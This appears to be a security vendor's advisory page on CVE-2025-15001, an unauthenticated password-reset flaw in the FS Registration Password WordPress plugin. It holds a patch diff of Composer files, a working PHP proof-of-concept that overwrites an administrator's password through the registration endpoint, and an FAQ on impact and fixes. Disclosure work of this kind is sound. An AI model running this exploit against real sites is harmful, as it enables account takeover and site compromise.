-            if (array_key_exists('replaced', $installed['versions'][$packageName])) {
-                $ranges = array_merge($ranges, $installed['versions'][$packageName]['replaced']);
-            }
-            if (array_key_exists('provided', $installed['versions'][$packageName])) {
-                $ranges = array_merge($ranges, $installed['versions'][$packageName]['provided']);
-            }
-
-            return implode(' || ', $ranges);
-        }
-
-        throw new OutOfBoundsException('Package "' . $packageName . '" is not installed');
-    }
-
-    /**
-     * @param  string      $packageName
-     * @return string|null If the package is being replaced or provided but is not really installed, null will be returned as version, use satisfies or getVersionRanges if you need to know if a given version is present
-     */
-    public static function getVersion($packageName)
-    {
-        foreach (self::getInstalled() as $installed) {
-            if (!isset($installed['versions'][$packageName])) {
-                continue;
-            }
-
-            if (!isset($installed['versions'][$packageName]['version'])) {
-                return null;
-            }
-
-            return $installed['versions'][$packageName]['version'];
-        }
-
-        throw new OutOfBoundsException('Package "' . $packageName . '" is not installed');
-    }
-
-    /**
-     * @param  string      $packageName
-     * @return string|null If the package is being replaced or provided but is not really installed, null will be returned as version, use satisfies or getVersionRanges if you need to know if a given version is present
-     */
-    public static function getPrettyVersion($packageName)
-    {
-        foreach (self::getInstalled() as $installed) {
-            if (!isset($installed['versions'][$packageName])) {
-                continue;
-            }
-
-            if (!isset($installed['versions'][$packageName]['pretty_version'])) {
-                return null;
-            }
-
-            return $installed['versions'][$packageName]['pretty_version'];
-        }
-
-        throw new OutOfBoundsException('Package "' . $packageName . '" is not installed');
-    }
-
-    /**
-     * @param  string      $packageName
-     * @return string|null If the package is being replaced or provided but is not really installed, null will be returned as reference
-     */
-    public static function getReference($packageName)
-    {
-        foreach (self::getInstalled() as $installed) {
-            if (!isset($installed['versions'][$packageName])) {
-                continue;
-            }
-
-            if (!isset($installed['versions'][$packageName]['reference'])) {
-                return null;
-            }
-
-            return $installed['versions'][$packageName]['reference'];
-        }
-
-        throw new OutOfBoundsException('Package "' . $packageName . '" is not installed');
-    }
-
-    /**
-     * @param  string      $packageName
-     * @return string|null If the package is being replaced or provided but is not really installed, null will be returned as install path. Packages of type metapackages also have a null install path.
-     */
-    public static function getInstallPath($packageName)
-    {
-        foreach (self::getInstalled() as $installed) {
-            if (!isset($installed['versions'][$packageName])) {
-                continue;
-            }
-
-            return isset($installed['versions'][$packageName]['install_path']) ? $installed['versions'][$packageName]['install_path'] : null;
-        }
-
-        throw new OutOfBoundsException('Package "' . $packageName . '" is not installed');
-    }
-
-    /**
-     * @return array
-     * @psalm-return array{name: string, version: string, reference: string, pretty_version: string, aliases: string[], dev: bool, install_path: string}
-     */
-    public static function getRootPackage()
-    {
-        $installed = self::getInstalled();
-
-        return $installed[0]['root'];
-    }
-
-    /**
-     * Returns the raw installed.php data for custom implementations
-     *
-     * @deprecated Use getAllRawData() instead which returns all datasets for all autoloaders present in the process. getRawData only returns the first dataset loaded, which may not be what you expect.
-     * @return array[]
-     * @psalm-return array{root: array{name: string, version: string, reference: string, pretty_version: string, aliases: string[], dev: bool, install_path: string}, versions: array<string, array{dev_requirement: bool, pretty_version?: string, version?: string, aliases?: string[], reference?: string, replaced?: string[], provided?: string[], install_path?: string}>}
-     */
-    public static function getRawData()
-    {
-        @trigger_error('getRawData only returns the first dataset loaded, which may not be what you expect. Use getAllRawData() instead which returns all datasets for all autoloaders present in the process.', E_USER_DEPRECATED);
-
-        if (null === self::$installed) {
-            // only require the installed.php file if this file is loaded from its dumped location,
-            // and not from its source location in the composer/composer package, see https://github.com/composer/composer/issues/9937
-            if (substr(__DIR__, -8, 1) !== 'C') {
-                self::$installed = include __DIR__ . '/installed.php';
-            } else {
-                self::$installed = array();
-            }
-        }
-
-        return self::$installed;
-    }
-
-    /**
-     * Returns the raw data of all installed.php which are currently loaded for custom implementations
-     *
-     * @return array[]
-     * @psalm-return list<array{root: array{name: string, version: string, reference: string, pretty_version: string, aliases: string[], dev: bool, install_path: string}, versions: array<string, array{dev_requirement: bool, pretty_version?: string, version?: string, aliases?: string[], reference?: string, replaced?: string[], provided?: string[], install_path?: string}>}>
-     */
-    public static function getAllRawData()
-    {
-        return self::getInstalled();
-    }
-
-    /**
-     * Lets you reload the static array from another file
-     *
-     * This is only useful for complex integrations in which a project needs to use
-     * this class but then also needs to execute another project's autoloader in process,
-     * and wants to ensure both projects have access to their version of installed.php.
-     *
-     * A typical case would be PHPUnit, where it would need to make sure it reads all
-     * the data it needs from this class, then call reload() with
-     * `require $CWD/vendor/composer/installed.php` (or similar) as input to make sure
-     * the project in which it runs can then also use this class safely, without
-     * interference between PHPUnit's dependencies and the project's dependencies.
-     *
-     * @param  array[] $data A vendor/composer/installed.php data set
-     * @return void
-     *
-     * @psalm-param array{root: array{name: string, version: string, reference: string, pretty_version: string, aliases: string[], dev: bool, install_path: string}, versions: array<string, array{dev_requirement: bool, pretty_version?: string, version?: string, aliases?: string[], reference?: string, replaced?: string[], provided?: string[], install_path?: string}>} $data
-     */
-    public static function reload($data)
-    {
-        self::$installed = $data;
-        self::$installedByVendor = array();
-    }
-
-    /**
-     * @return array[]
-     * @psalm-return list<array{root: array{name: string, version: string, reference: string, pretty_version: string, aliases: string[], dev: bool, install_path: string}, versions: array<string, array{dev_requirement: bool, pretty_version?: string, version?: string, aliases?: string[], reference?: string, replaced?: string[], provided?: string[], install_path?: string}>}>
-     */
-    private static function getInstalled()
-    {
-        if (null === self::$canGetVendors) {
-            self::$canGetVendors = method_exists('ComposerAutoloadClassLoader', 'getRegisteredLoaders');
-        }
-
-        $installed = array();
-
-        if (self::$canGetVendors) {
-            foreach (ClassLoader::getRegisteredLoaders() as $vendorDir => $loader) {
-                if (isset(self::$installedByVendor[$vendorDir])) {
-                    $installed[] = self::$installedByVendor[$vendorDir];
-                } elseif (is_file($vendorDir.'/composer/installed.php')) {
-                    $installed[] = self::$installedByVendor[$vendorDir] = require $vendorDir.'/composer/installed.php';
-                    if (null === self::$installed && strtr($vendorDir.'/composer', '\', '/') === strtr(__DIR__, '\', '/')) {
-                        self::$installed = $installed[count($installed) - 1];
-                    }
-                }
-            }
-        }
-
-        if (null === self::$installed) {
-            // only require the installed.php file if this file is loaded from its dumped location,
-            // and not from its source location in the composer/composer package, see https://github.com/composer/composer/issues/9937
-            if (substr(__DIR__, -8, 1) !== 'C') {
-                self::$installed = require __DIR__ . '/installed.php';
-            } else {
-                self::$installed = array();
-            }
-        }
-        $installed[] = self::$installed;
-
-        return $installed;
-    }
-}
--- a/registration-password/vendor/composer/autoload_classmap.php
+++ b/registration-password/vendor/composer/autoload_classmap.php
@@ -1,10 +0,0 @@
-<?php
-
-// autoload_classmap.php @generated by Composer
-
-$vendorDir = dirname(dirname(__FILE__));
-$baseDir = dirname($vendorDir);
-
-return array(
-    'Composer\InstalledVersions' => $vendorDir . '/composer/InstalledVersions.php',
-);
--- a/registration-password/vendor/composer/autoload_namespaces.php
+++ b/registration-password/vendor/composer/autoload_namespaces.php
@@ -1,9 +0,0 @@
-<?php
-
-// autoload_namespaces.php @generated by Composer
-
-$vendorDir = dirname(dirname(__FILE__));
-$baseDir = dirname($vendorDir);
-
-return array(
-);
--- a/registration-password/vendor/composer/autoload_psr4.php
+++ b/registration-password/vendor/composer/autoload_psr4.php
@@ -1,10 +0,0 @@
-<?php
-
-// autoload_psr4.php @generated by Composer
-
-$vendorDir = dirname(dirname(__FILE__));
-$baseDir = dirname($vendorDir);
-
-return array(
-    'Fsylum\RegistrationPassword\' => array($baseDir . '/src'),
-);
--- a/registration-password/vendor/composer/autoload_real.php
+++ b/registration-password/vendor/composer/autoload_real.php
@@ -1,55 +0,0 @@
-<?php
-
-// autoload_real.php @generated by Composer
-
-class ComposerAutoloaderInit79e22c08f5c32b16bcd5346f5430b3bc
-{
-    private static $loader;
-
-    public static function loadClassLoader($class)
-    {
-        if ('ComposerAutoloadClassLoader' === $class) {
-            require __DIR__ . '/ClassLoader.php';
-        }
-    }
-
-    /**
-     * @return ComposerAutoloadClassLoader
-     */
-    public static function getLoader()
-    {
-        if (null !== self::$loader) {
-            return self::$loader;
-        }
-
-        spl_autoload_register(array('ComposerAutoloaderInit79e22c08f5c32b16bcd5346f5430b3bc', 'loadClassLoader'), true, true);
-        self::$loader = $loader = new ComposerAutoloadClassLoader(dirname(dirname(__FILE__)));
-        spl_autoload_unregister(array('ComposerAutoloaderInit79e22c08f5c32b16bcd5346f5430b3bc', 'loadClassLoader'));
-
-        $useStaticLoader = PHP_VERSION_ID >= 50600 && !defined('HHVM_VERSION') && (!function_exists('zend_loader_file_encoded') || !zend_loader_file_encoded());
-        if ($useStaticLoader) {
-            require __DIR__ . '/autoload_static.php';
-
-            call_user_func(ComposerAutoloadComposerStaticInit79e22c08f5c32b16bcd5346f5430b3bc::getInitializer($loader));
-        } else {
-            $map = require __DIR__ . '/autoload_namespaces.php';
-            foreach ($map as $namespace => $path) {
-                $loader->set($namespace, $path);
-            }
-
-            $map = require __DIR__ . '/autoload_psr4.php';
-            foreach ($map as $namespace => $path) {
-                $loader->setPsr4($namespace, $path);
-            }
-
-            $classMap = require __DIR__ . '/autoload_classmap.php';
-            if ($classMap) {
-                $loader->addClassMap($classMap);
-            }
-        }
-
-        $loader->register(true);
-
-        return $loader;
-    }
-}
--- a/registration-password/vendor/composer/autoload_static.php
+++ b/registration-password/vendor/composer/autoload_static.php
@@ -1,36 +0,0 @@
-<?php
-
-// autoload_static.php @generated by Composer
-
-namespace ComposerAutoload;
-
-class ComposerStaticInit79e22c08f5c32b16bcd5346f5430b3bc
-{
-    public static $prefixLengthsPsr4 = array (
-        'F' =>
-        array (
-            'Fsylum\RegistrationPassword\' => 28,
-        ),
-    );
-
-    public static $prefixDirsPsr4 = array (
-        'Fsylum\RegistrationPassword\' =>
-        array (
-            0 => __DIR__ . '/../..' . '/src',
-        ),
-    );
-
-    public static $classMap = array (
-        'Composer\InstalledVersions' => __DIR__ . '/..' . '/composer/InstalledVersions.php',
-    );
-
-    public static function getInitializer(ClassLoader $loader)
-    {
-        return Closure::bind(function () use ($loader) {
-            $loader->prefixLengthsPsr4 = ComposerStaticInit79e22c08f5c32b16bcd5346f5430b3bc::$prefixLengthsPsr4;
-            $loader->prefixDirsPsr4 = ComposerStaticInit79e22c08f5c32b16bcd5346f5430b3bc::$prefixDirsPsr4;
-            $loader->classMap = ComposerStaticInit79e22c08f5c32b16bcd5346f5430b3bc::$classMap;
-
-        }, null, ClassLoader::class);
-    }
-}
--- a/registration-password/vendor/composer/installed.php
+++ b/registration-password/vendor/composer/installed.php
@@ -1,23 +0,0 @@
-<?php return array(
-    'root' => array(
-        'pretty_version' => '1.0.1',
-        'version' => '1.0.1.0',
-        'type' => 'library',
-        'install_path' => __DIR__ . '/../../',
-        'aliases' => array(),
-        'reference' => 'e5bbfccb7078f536cb258bc5225fd7892b0b60a5',
-        'name' => '__root__',
-        'dev' => true,
-    ),
-    'versions' => array(
-        '__root__' => array(
-            'pretty_version' => '1.0.1',
-            'version' => '1.0.1.0',
-            'type' => 'library',
-            'install_path' => __DIR__ . '/../../',
-            'aliases' => array(),
-            'reference' => 'e5bbfccb7078f536cb258bc5225fd7892b0b60a5',
-            'dev_requirement' => false,
-        ),
-    ),
-);

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15001 - FS Registration Password <= 1.0.1 - Unauthenticated Privilege Escalation via Account Takeover

<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$victim_username = 'administrator';
$victim_email = 'admin@site.com';
$new_password = 'Hacked123!';

$registration_endpoint = $target_url . '/wp-login.php?action=register';

// Prepare the malicious registration POST data.
// We are attempting to 'register' a user that already exists.
$post_data = [
    'user_login' => $victim_username,
    'user_email' => $victim_email,
    'pass1' => $new_password,
    'pass2' => $new_password,
    'wp-submit' => 'Register',
    // This parameter triggers the vulnerable plugin code.
    'fs_is_password_for_registration' => 'yes'
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $registration_endpoint);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// The response will contain an error about the user already existing, which is expected.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo "[*] Request sent. Check if password for '$victim_username' was changed to '$new_password'.n";
    echo "[*] Attempt login at: " . $target_url . "/wp-login.phpn";
} else {
    echo "[!] Unexpected HTTP status: $http_coden";
}

?>

Frequently Asked Questions

What is CVE-2025-15001?
Understanding the vulnerability
CVE-2025-15001 is a critical vulnerability in the FS Registration Password plugin for WordPress, affecting versions up to and including 1.0.1. It allows unauthenticated attackers to change the passwords of any user account, including administrators, leading to complete account takeover.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the plugin’s failure to validate user identity when updating passwords. An attacker can send a specially crafted POST request to the registration endpoint, causing the plugin to overwrite an existing user’s password without authentication.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the FS Registration Password plugin version 1.0.1 or earlier is vulnerable. This includes sites with user accounts, especially those with administrative privileges, as they can be targeted for account takeover.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is affected, check the version of the FS Registration Password plugin installed. If it is version 1.0.1 or earlier, your site is vulnerable and requires immediate action.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 2.0.1 of the FS Registration Password plugin. Update your plugin to this version or later to mitigate the risk associated with CVE-2025-15001.
What if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider disabling the FS Registration Password plugin until you can upgrade. Additionally, monitor user accounts for unauthorized changes and implement strong password policies.
What does a CVSS score of 9.8 mean?
Understanding severity levels
A CVSS score of 9.8 indicates that the vulnerability is critical, meaning it has a high potential for exploitation with significant impact on confidentiality, integrity, and availability. This level of risk requires urgent attention from site administrators.
What are the practical risks of this vulnerability?
Potential consequences
Successful exploitation allows attackers to gain full control over user accounts, including administrators. This can lead to unauthorized access, data breaches, and potential site compromise, affecting the entire WordPress installation.
How does the proof of concept demonstrate the issue?
Technical illustration of exploitation
The proof of concept shows how an attacker can craft a malicious POST request to the registration endpoint, effectively changing the password of an existing user. It illustrates the lack of authentication checks, enabling the attack.
What should I do if I suspect my site has been compromised?
Responding to a potential breach
If you suspect that your site has been compromised due to this vulnerability, immediately change passwords for all accounts, especially administrative ones. Conduct a thorough security audit and consider restoring from a clean backup.
Are there any additional security measures I should implement?
Enhancing overall security
In addition to updating plugins, consider implementing two-factor authentication for user accounts, regularly monitoring logs for suspicious activity, and employing security plugins that provide additional layers of protection.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations